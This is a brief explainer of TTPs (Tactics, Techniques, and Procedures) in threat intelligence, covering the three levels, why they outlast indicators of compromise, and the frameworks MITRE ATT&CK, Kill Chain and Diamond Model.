Cybersecurity framework that breaks down how attackers operate into three distinct levels. Security teams adopted this from military intelligence because it works better than traditional IOC-based approaches for understanding adversary behavior.
What does TTP stand for?
Tactics, Techniques, and Procedures – three levels of detail about what threat actors do during campaigns.
Framework Breakdown
- Tactics cover the big-picture goals attackers have during different attack phases. Things like getting initial access, staying persistent, moving around networks, and stealing data. These don't really change much between campaigns from the same threat group.
- Techniques are the specific methods they use to hit those goals. Spear-phishing for getting in, PowerShell abuse for staying hidden, credential dumping for privilege escalation. Security researchers have cataloged hundreds of these now.
- Procedures go deep - exact tools used, specific commands run, how they configure their malware. This stuff varies the most between different groups and changes frequently.
Why are TTPs important in cybersecurity?
Traditional indicators burn out fast. Attackers switch IP addresses and malware constantly. But their operational habits stick around much longer. Same group will often follow similar attack patterns even when everything else changes.
How are TTPs used in threat intelligence?
Analysts map out how specific threat groups work so they can spot them again. During incidents, knowing a group’s usual playbook helps predict what they’ll do next and where to focus response efforts.
What frameworks are commonly used to categorize TTPs?
- MITRE ATT&CK: Most widely used framework. Maps real attack techniques with regular updates as new methods get discovered.
- Cyber Kill Chain: Seven-phase model from Lockheed Martin. Still popular for understanding attack flow.
- Diamond Model: Looks at connections between adversaries, capabilities, infrastructure, and victims. Good for linking related incidents.
